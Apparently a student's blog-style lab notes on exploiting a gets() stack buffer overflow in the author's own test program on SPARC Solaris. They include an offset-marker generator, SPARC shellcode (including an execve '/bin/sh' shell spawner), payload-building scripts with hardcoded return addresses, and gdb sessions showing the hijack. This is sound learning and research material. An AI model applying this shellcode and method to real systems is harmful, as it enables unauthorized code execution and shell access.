# or i want to use gdb:
/home/bazz/tools/tmp/latest/invoke2 -d v
# then from in gdb:
# r < super_payload

Interesting note on overflowing a buffer accepted through standard input: the 0x0a byte has the same effect as a null byte, because gets() stops reading at the newline. That was not documented anywhere >_< 0x0a is \n iirc; I wonder if the \r byte (0x0d) has the same effect.. I could try it out but I’m not…

Below is my buffer overflow “marker” program source code. This is documented at https://blogs.umb.edu/michaelbazzinott001/2014/09/25/alternating-payload-automated-offset-calculation-and-identification/
Together with the shellcode assist program, it creates a block of the specified length and writes it to stdout.
You are then required to concatenate any arbitrary data plus the null byte (or, apparently, \n).

#include <stdio.h>
#include <stdlib.h>

// SPARC uses sys/inttypes.h
#ifdef __sun
  #include <sys/inttypes.h>
#else
  #include <stdint.h>
#endif

// this form provides buffer experimentation foundation
// buffer will be created up to numbytes desired, but < MAX, specified
// on the command line argument
// form: 0x[01-ff][41-5a][41-5a][41-5a]

// 0x41-0x5a range is chars 'A' to 'Z'
// An extended range < 'A' to > 'Z' could modify this program to extend
//the MAX length of the buffer

// Number of distinct letters a word can carry ('A'..'Z' inclusive).
#define CHAR_RANGE (('Z'-'A')+1)  // 'Z' - 'A' is 25, but I know
// there are 26 letters in the alphabet. I call this inclusive subtraction,
// when I add 1 to get the real desired value. There is also inclusive
// addition I think. I'm using terms I created.
// little proof program to figure this out
/*

#include <stdio.h>

// Conclusion: Inclusive Subtraction requires add 1

int main()
{
  printf("Derp Face, I'm ready :) \n");
  printf("'Z' - 'A' = %d", ('Z'-'A')+1);

  return 0;
}

*/

// Largest pattern (in bytes) in which every (tag, letter) word is unique:
// 255 tag values x 26 letters x 4 bytes per word.
#define MAX (CHAR_RANGE * 255 * 4)
// Arbitrary MAX that is derived from the following formula:
// 26a * 255b * 4c
// a [letters of the alphabet]
// b [ byte field width excluding 0 (null byte)]
// c [ 4 bytes per entry ie. 0x01414141 ]

// Bytes emitted per tag byte value: one full cycle of 26 letters at 4 bytes
// per word (same value as CHAR_RANGE * 4); main() bumps the tag every RANGE
// bytes.
#define RANGE (26*4)

// does the following operation to get the offset:
// [(msb - 1) * 26] + (lsb - 0x41)
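/*
 * Map a smashed 32-bit word back to its index in the marker pattern.
 *
 * main() emits words of the form 0xCC AA AA AA where CC is a tag byte that
 * starts at 1 and advances every 26 words and AA is a letter 'A'..'Z' that
 * cycles every word, so word k has CC = k/26 + 1 and AA = 'A' + k%26.
 * Inverting: offset = (CC - 1) * 26 + (AA - 'A').
 *
 * The result is a WORD index (byte offset / 4) and is only meaningful for a
 * word-aligned read of the pattern with CC >= 1 and 'A' <= AA <= 'Z'; the
 * value is not range-checked here (main() does the coarse check).
 *
 * The arithmetic is done in unsigned long.  The previous version did it in
 * uint8_t, so (CC - 1) * 26 wrapped at 256 and every tag from 0x0b upward
 * produced a wrong answer.  26 here equals CHAR_RANGE above.
 */
unsigned long getSmashOffset(const unsigned long *smashval)
{
  unsigned long msb = (*smashval >> 24) & 0xff;   /* tag byte */
  unsigned long lsb = *smashval & 0xff;           /* last of the three letters */

  return (msb - 1) * 26 + (lsb - 'A');
}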

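/*
 * Marker-pattern generator / offset decoder.
 *
 *   prog <numbytes>      (numbytes <= MAX)  emit that many pattern bytes
 *   prog <smashed-word>  (value > MAX)      print the word index that value
 *                                           sits at, via getSmashOffset()
 *
 * The pattern is a run of 4-byte words "c a a a": a cycles 'A'..'Z' with
 * every word, c is a tag byte starting at 1 that advances every RANGE bytes
 * (26 words) and skips 0 so the stream never contains a NUL.  No terminator
 * is written; the caller appends it (see the text above).
 *
 * Exit status: 0 on success, 1 on bad usage or an unparsable argument,
 * 2 when the value is above MAX but too small to be a smashed word.
 */
int main(int argc, char **argv)
{
  char *end = NULL;
  unsigned long arg;

  if (argc != 2)
  {
    printf ("You're doing it wrong! \n");
    printf ("Usage: %s [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX);
    exit (1);
  }

  /* The original passed a NULL endptr, so "abc" silently became 0 bytes;
   * reject anything that is not entirely a number (base 0: 0x... allowed). */
  arg = strtoul( argv[1], &end, 0 );
  if (end == argv[1] || *end != '\0')
  {
    printf ("You're doing it wrong! \n");
    printf ("Usage: %s [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX);
    exit (1);
  }

  if (arg > MAX)
  {
    /* Too big to be a length: treat it as a smashed register value, which
     * must be at least the first pattern word 0x01414141. */
    if (arg < 0x01414141)
    {
      printf ("You can't have an overflow amount > %d\n", MAX);
      exit(2);
    }
    printf ("%lu\n", getSmashOffset(&arg));
    return 0;
  }

  {
    const unsigned long numbytes = arg;
    unsigned char letter = 'A' - 1;  /* bumped before first use -> 'A' */
    unsigned char tag = 1;           /* unsigned: plain char may be signed */
    int in_block = 0;                /* bytes emitted under the current tag */

    for (unsigned long i = 0; i < numbytes; i++)
    {
      if (i % 4 == 0)
      {
        /* Word boundary: emit the tag and pick this word's letter. */
        putchar(tag);
        letter = (letter == 'Z') ? 'A' : (unsigned char)(letter + 1);
      }
      else
      {
        putchar(letter);
      }

      if (++in_block == RANGE)
      {
        in_block = 0;
        tag++;
        if (tag == 0)
          tag++;                     /* 0 would put a NUL in the pattern */
      }
    }
  }
  return 0;
}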

Check it out, here’s a stupid program that uses the write syscall to write some text “Hello” to stdout.

write_raw.S

bazz@blade72[pts/3][~/nobackup/fun] cat write_raw.S
! write_raw.S: write(1, "Hello\n", 7) followed by exit(0), issued through the
! raw trap interface (ta 8 with the syscall number in %g1 and arguments in
! %o0..%o2).  The string is built on the stack instead of living in a data
! section so the code is self-contained once dumped to a flat binary.
.globl main
main:
! %o1 must point to the string! let's store the string on the stack
set 0x48656c6c, %o0     !"Hell"
st %o0, [%sp+84]
set 0x6f0a0000, %o0     ! "o\n"
st %o0, [%sp+88]
add %sp, 84, %o1        ! %o1 = address of "Hello\n" plus one NUL (7 bytes)

mov  1, %o0             ! fd 1 = stdout
mov  7, %o2             ! byte count
mov  4, %g1             ! 4 = write on this box (see the "Hello" output below)
ta  8

! addition to prevent illegal instruction failure
mov 1, %g1  ! move 1(exit() syscall) into %g1
mov 0, %o0    ! move 0(return address) into %o0
ta 8          ! call the kernel
bazz@blade72[pts/3][~/nobackup/fun] gcc write_raw.S -o /tmp/write_ex
bazz@blade72[pts/3][~/nobackup/fun] /tmp/write_ex
Hello
bazz@blade72[pts/3][~/nobackup/fun

This gets transformed to shellcode like this:

bazz@blade72[pts/3][~/nobackup/fun/asmshell] declare -f buildsc
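# buildsc NAME: assemble NAME.S and dump the raw contents of NAME.o to
# NAME.bin.  NAME is given without extension.  objcopy now runs only if the
# assembler succeeded, so a stale NAME.o is never re-dumped as fresh output;
# arguments are quoted so names with spaces are handled.
buildsc ()
{
    if [ -z "$1" ]; then
        echo 'buildsc filename no extension';
        return 1;
    fi;
    as "$1.S" -o "$1.o" && objcopy -O binary "$1.o" "$1.bin"
}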

An alternative to objcopy, also sparcv9 how to:

bazz@vm72[pts/3][~/tools/tmp] cat asmtobin.sh
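# asmtobin.sh NAME (no extension): assemble NAME.S as sparcv9 and have ld
# write the flat binary directly, instead of going through objcopy.
# Stop if the assembler fails so ld is not run on a stale object.
as -Av9 "$1.S" -o "$1.o" || exit 1
ld "$1.o" -o "$1.bin" --oformat=binary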
bazz@vm72[pts/3][~/tools/tmp]
bazz@blade72[pts/3][~/nobackup/fun] buildsc write_raw
bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.
write_raw.S    write_raw.bin  write_raw.o
bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.bin
000000 1112195b 9012206c d023a054 111bc280
000010 d023a058 9203a054 90102001 94102007
000020 82102004 91d02008 82102001 90102000
000030 91d02008
000034

Then, to correctly put out a buffer, this knowledge comes from experimenting and debugging the target binary..

bazz@blade72[pts/1][~/tools/tmp/latest] cat build_shellcode_steps
# Usage: ./build_shellcode_steps <shellcode.bin> > payload
# Output: marker filler, then the saved %fp/%i7 values, then padding, then the
# shellcode file, then the terminator gets() stops at.
./alternating_payload3 328  # payload size to arrive at %fp and %i7
# fp which becomes the $sp I use during our infected run. These vals
# were obtained from live debugging and a better final adaptive method should be used
# at production level.
# orig val: ffbefe78
printf "\xff\xbe\xfd\x78"
# return address:
# original val: ffbefe78
printf "\xff\xbe\xfe\xf8"
#printf "\xff\xbe\xfe\x38" >> payload
# orig val: 0x40
# experimented displacing the payload farther "up" the stack
perl -e 'print "A"x0xc0'
cat $1 # payload bin file
printf "\x00"
bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps write_raw.bin > payload
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) list 0
1       #include <stdio.h>
2       unsigned long get_sp( void ) {
3               __asm__("or %sp,%sp,%r1");
4       }
5
6       void copy( ){
7               char buf[256];
8
9               gets(buf);
10      }
(gdb)
11
12      int main( ) {
13              unsigned long ret = get_sp();
14              fprintf (stderr, "sp = 0x%x\n", ret);
15              copy(  );
16              return 0;
17      }
(gdb) b 16
Breakpoint 1 at 0x10790: file v.c, line 16.
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Breakpoint 1, main () at v.c:16
16              return 0;
(gdb) # overflow just happened
(gdb) x/96x $sp
# at this point, this current stack frame's %fp and %i7 are below and are the infected ones
# that will be returned upon the next ret restore.
# at the top of this printout is a continuation from my marker program,
# you can see the pattern. The beginning of the buffer could be looked at by
# going lower in memory ie. x/96x $sp-96 or farther down as well..
# but that's not necessary for us. this post is to show how the write syscalls
# are about to be executed just fine, but later the execv
# syscall just returns and I don't get a shell for some reason.
0xffbefe00:     0x03515151      0x03525252      0x03535353      0x03545454
0xffbefe10:     0x03555555      0x03565656      0x03575757      0x03585858
0xffbefe20:     0x03595959      0x035a5a5a      0x04414141      0x04424242
0xffbefe30:     0x04434343      0x04444444      0xffbefd78      0xffbefef8
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefec0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefed0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefee0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefef0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbeff00:     0x1112195b      0x9012206c      0xd023a054      0x111bc280
0xffbeff10:     0xd023a058      0x9203a054      0x90102001      0x94102007
0xffbeff20:     0x82102004      0x91d02008      0x82102001      0x90102000
0xffbeff30:     0x91d02008      0x00002000      0x000007d0      0x00001caf
0xffbeff40:     0x000007d1      0x00001caf      0x000007d2      0x00002801
0xffbeff50:     0x000007d3      0x00002801      0x000007d9      0x00000007
0xffbeff60:     0x00000000      0x00000000      0x2f6e6f62      0x61636b75
---Type <return> to continue, or q <return> to quit---
0xffbeff70:     0x702f626c      0x61646537      0x345f7364      0x30672f62
(gdb) si
17      }
(gdb)
0x00010798      17      }
(gdb) x/4i $pc
0x10798 <main+64>:      ret
0x1079c <main+68>:      restore
0x107a0 <main+72>:      retl
0x107a4 <main+76>:      add  %o7, %l7, %l7
(gdb) si
0x0001079c      17      }
(gdb)
0xffbeff00 in ?? ()
(gdb) x/16i $pc
0xffbeff00:     sethi  %hi(0x48656c00), %o0
0xffbeff04:     or  %o0, 0x6c, %o0      ! 0x48656c6c
0xffbeff08:     st  %o0, [ %sp + 0x54 ]
0xffbeff0c:     sethi  %hi(0x6f0a0000), %o0
0xffbeff10:     st  %o0, [ %sp + 0x58 ]
0xffbeff14:     add  %sp, 0x54, %o1
0xffbeff18:     mov  1, %o0
0xffbeff1c:     mov  7, %o2
0xffbeff20:     mov  4, %g1
0xffbeff24:     ta  8
0xffbeff28:     mov  1, %g1
0xffbeff2c:     clr  %o0
0xffbeff30:     ta  8
0xffbeff34:     unimp  0x2000
0xffbeff38:     unimp  0x7d0
0xffbeff3c:     unimp  0x1caf
(gdb) si
0xffbeff04 in ?? ()
(gdb)
0xffbeff08 in ?? ()
(gdb)
0xffbeff0c in ?? ()
(gdb)
0xffbeff10 in ?? ()
(gdb)
0xffbeff14 in ?? ()
(gdb)
0xffbeff18 in ?? ()
(gdb)
0xffbeff1c in ?? ()
(gdb)
0xffbeff20 in ?? ()
(gdb)
0xffbeff24 in ?? ()
(gdb)
Hello
0xffbeff28 in ?? ()
(gdb)
0xffbeff2c in ?? ()
(gdb)
0xffbeff30 in ?? ()
(gdb)

Program exited normally.
(gdb) del
Delete all breakpoints? (y or n) y
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90
Hello

Program exited normally.
(gdb) q
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload
sp = 0xffbefd90
Hello
bazz@blade72[pts/1][~/tools/tmp/latest]

OK I clearly demonstrated how the write example buffer overflow hijacked just fine.

But now.. a shell spawn fails, and I don’t know why:

bazz@blade72[pts/3][~/nobackup/fun/asmshell] cat asmshell3.S
.globl main
main:
set 0x2f62696e, %o0
st %o0, [%sp+84]
set 0x2f736800, %o0
st %o0, [%sp+88]
add %sp, 84, %o0
clr [%sp+92]
st %o0, [%sp+76]
clr [%sp+80]
add %sp, 76, %o1
xor %o5,%o5,%o2
mov 0x3b, %g1
ta 8
!ta 8
! addition to prevent illegal instruction failure
xor %o5,%o5,%o0
!add %o1,%o1,%o0
! interprets as end of string!! even without null byte ! and o1, 2, %o0         ! exit(0)
mov     1, %g1
ta      8

bazz@blade72[pts/3][~/nobackup/fun/asmshell] buildsc asmshell3
bazz@blade72[pts/3][~/nobackup/fun/asmshell] od -X -A x asmshell3.bin
000000 110bd89a 9012216e d023a054 110bdcda
000010 d023a058 9003a054 c023a05c d023a04c
000020 c023a050 9203a04c 941b400d 8210203b
000030 91d02008 901b400d 82102001 91d02008
000040
bazz@blade72[pts/3][~/nobackup/fun/asmshell] cp asmshell3.bin ~/tools/tmp/latest

bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps asmshell3.bin > payload
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) b 16
Breakpoint 1 at 0x10790: file v.c, line 16.
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Breakpoint 1, main () at v.c:16
16              return 0;
(gdb) x/96x $sp
0xffbefe00:     0x03515151      0x03525252      0x03535353      0x03545454
0xffbefe10:     0x03555555      0x03565656      0x03575757      0x03585858
0xffbefe20:     0x03595959      0x035a5a5a      0x04414141      0x04424242
0xffbefe30:     0x04434343      0x04444444      0xffbefd78      0xffbefef8
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefec0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefed0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefee0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefef0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbeff00:     0x110bd89a      0x9012216e      0xd023a054      0x110bdcda
0xffbeff10:     0xd023a058      0x9003a054      0xc023a05c      0xd023a04c
0xffbeff20:     0xc023a050      0x9203a04c      0x941b400d      0x8210203b
0xffbeff30:     0x91d02008      0x901b400d      0x82102001      0x91d02008
0xffbeff40:     0x000007d1      0x00001caf      0x000007d2      0x00002801
0xffbeff50:     0x000007d3      0x00002801      0x000007d9      0x00000007
0xffbeff60:     0x00000000      0x00000000      0x2f6e6f62      0x61636b75
---Type <return> to continue, or q <return> to quit---
0xffbeff70:     0x702f626c      0x61646537      0x345f7364      0x30672f62
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0xff3b3be0 in ?? ()
(gdb) c
Continuing.

Program exited normally.
# NO SHELL!!!
(gdb) q
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload
sp = 0xffbefd90
bazz@blade72[pts/1][~/tools/tmp/latest] #NO SHELL!!! 
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Program received signal SIGTRAP, Trace/breakpoint trap.
0xff3b3be0 in ?? ()
(gdb) x/16i $pc
0xff3b3be0:     b,a   0xff3b3bec
0xff3b3be4:     b,a   0xff3b3bf0
0xff3b3be8:     b,a   0xff3b3bf4
0xff3b3bec:     mov  %g0, %o0
0xff3b3bf0:     save  %sp, -160, %sp
0xff3b3bf4:     call  0xff3b3bfc
0xff3b3bf8:     sethi  %hi(0x2c800), %l7
0xff3b3bfc:     or  %l7, 0x3b4, %l7     ! 0x2cbb4
0xff3b3c00:     addcc  %i0, %g0, %o0
0xff3b3c04:     bne  0xff3b3c60
0xff3b3c08:     add  %l7, %o7, %l7
0xff3b3c0c:     add  %sp, 0x60, %o0
0xff3b3c10:     mov  3, %l0
0xff3b3c14:     st  %l0, [ %o0 ]
0xff3b3c18:     add  %fp, 0x44, %l0
0xff3b3c1c:     st  %l0, [ %o0 + 4 ]
(gdb) q
The program is running.  Exit anyway? (y or n) y
bazz@blade72[pts/1][~/tools/tmp/latest]

I seem to be in some trap handler.. Maybe the mysteries as to why it’s returning and not spawning a shell lie in there….

TO BE CONTINUED

… UPDATE!!!!

-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin
-bash-4.3$ truss $PWD/invoke2 v < payload
execve("/home/bazz/latest/invoke2", 0xFFBEFD3C, 0xFFBEFD4C)  argc = 3
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/usr/lib/libcurses.so.1", 0xFFBEF620)     = 0
resolvepath("/usr/lib/libcurses.so.1", "/usr/lib/libcurses.so.1", 1023) = 23
open("/usr/lib/libcurses.so.1", O_RDONLY)       = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x08F13AF8, 278528, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF340000
mmap(0xFF340000, 165416, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF340000
mmap(0xFF37A000, 28774, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 172032) = 0xFF37A000
mmap(0xFF382000, 6688, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF382000
munmap(0xFF36A000, 65536)                       = 0
memcntl(0xFF340000, 49420, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libsocket.so.1", 0xFFBEF620)     = 0
resolvepath("/usr/lib/libsocket.so.1", "/usr/lib/libsocket.so.1", 1023) = 23
open("/usr/lib/libsocket.so.1", O_RDONLY)       = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F13EE0, 114688, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF320000
mmap(0xFF320000, 40558, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF320000
mmap(0xFF33A000, 4365, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 40960) = 0xFF33A000
munmap(0xFF32A000, 65536)                       = 0
memcntl(0xFF320000, 14496, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libnsl.so.1", 0xFFBEF620)        = 0
resolvepath("/usr/lib/libnsl.so.1", "/usr/lib/libnsl.so.1", 1023) = 20
open("/usr/lib/libnsl.so.1", O_RDONLY)          = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F142C8, 655360, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF200000
mmap(0xFF200000, 582266, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF200000
mmap(0xFF290000, 33320, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 589824) = 0xFF290000
mmap(0xFF29A000, 23376, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF29A000
memcntl(0xFF200000, 84064, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF620)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F19CA0, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF310000
mmap(0xFF310000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF310000
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF300000
close(3)                                        = 0
stat("/usr/lib/libc.so.1", 0xFFBEF620)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x09899EB0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF100000
mmap(0xFF100000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF100000
mmap(0xFF1BC000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF1BC000
munmap(0xFF1AC000, 65536)                       = 0
memcntl(0xFF100000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libmp.so.2", 0xFFBEF620)         = 0
resolvepath("/usr/lib/libmp.so.2", "/usr/lib/libmp.so.2", 1023) = 19
open("/usr/lib/libmp.so.2", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x09899AC8, 90112, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2E0000
mmap(0xFF2E0000, 11316, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2E0000
mmap(0xFF2F4000, 865, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 16384) = 0xFF2F4000
munmap(0xFF2E4000, 65536)                       = 0
memcntl(0xFF2E0000, 3124, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF338) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2D0000
mmap(0xFF2D0000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2D0000
close(3)                                        = 0
munmap(0xFF390000, 8192)                        = 0
getcontext(0xFFBEFA88)
open64("/dev/tty", O_RDWR|O_NONBLOCK)           = 3
close(3)                                        = 0
brk(0x0010A060)                                 = 0
sysconfig(_CONFIG_PAGESIZE)                     = 8192
brk(0x0010A060)                                 = 0
brk(0x0010C000)                                 = 0
brk(0x0010E000)                                 = 0
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getcontext(0xFFBEFA88)
time()                                          = 1413348374
brk(0x00110000)                                 = 0
brk(0x00112000)                                 = 0
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20)      = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20)      = 0
sigprocmask(SIG_BLOCK, 0x00000000, 0x0010A020)  = 0
sigfillset(0xFF1C28D0)                          = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20)      = 0
uname(0xFFBEF5D8)                               = 1
stat64("/home/bazz/latest", 0xFFBEF928)         = 0
stat64(".", 0xFFBEF890)                         = 0
getpid()                                        = 2098 [2097]
getpid()                                        = 2098 [2097]
getpid()                                        = 2098 [2097]
getpgrp()                                       = 2097
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sysconfig(_CONFIG_CHILD_MAX)                    = 7893
getcontext(0xFFBEFA88)
open64("/home/bazz/latest/invoke2", O_RDONLY)   = 3
ioctl(3, TCGETA, 0xFFBEFAE4)                    Err#25 ENOTTY
llseek(3, 0, SEEK_CUR)                          = 0
read(3, " # ! / b i n / b a s h\n".., 80)       = 80
llseek(3, 0, SEEK_SET)                          = 0
getrlimit(RLIMIT_NOFILE, 0xFFBEFA78)            = 0
fcntl(255, F_GETFD, 0xFFBEFAE4)                 Err#9 EBADF
fcntl(3, F_DUP2FD, 0x000000FF)                  = 255
close(3)                                        = 0
fcntl(255, F_SETFD, 0x00000001)                 = 0
fcntl(255, F_GETFL, 0x00000000)                 = 8192
fstat64(255, 0xFFBEFAD8)                        = 0
fstat64(255, 0xFFBEFB30)                        = 0
llseek(255, 0, SEEK_CUR)                        = 0
getcontext(0xFFBEFA08)
read(255, " # ! / b i n / b a s h\n".., 718)    = 718
getcontext(0xFFBEFA08)
getcontext(0xFFBEFA08)
brk(0x00114000)                                 = 0
getcontext(0xFFBEF390)
getcontext(0xFFBEFA08)
getcontext(0xFFBEFA08)
sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF6B8)  = 0
getcontext(0xFFBEF488)
brk(0x00116000)                                 = 0
pipe()                                          = 3 [4]
sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670)  = 0
sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF67C, 0xFFBEF66C)  = 0
llseek(255, 0xFFFFFFFFFFFFFE63, SEEK_CUR)       = 305
fork()                                          = 2099
sigprocmask(SIG_SETMASK, 0xFFBEF66C, 0x00000000) = 0
    Received signal #18, SIGCLD [caught]
      siginfo: SIGCLD CLD_EXITED pid=2099 status=0x0001
waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) = 0
waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD
setcontext(0xFFBEF350)
sigaction(SIGCLD, 0xFFBEF5D0, 0xFFBEF650)       = 0
close(4)                                        = 0
read(3, " 0\n", 128)                            = 2
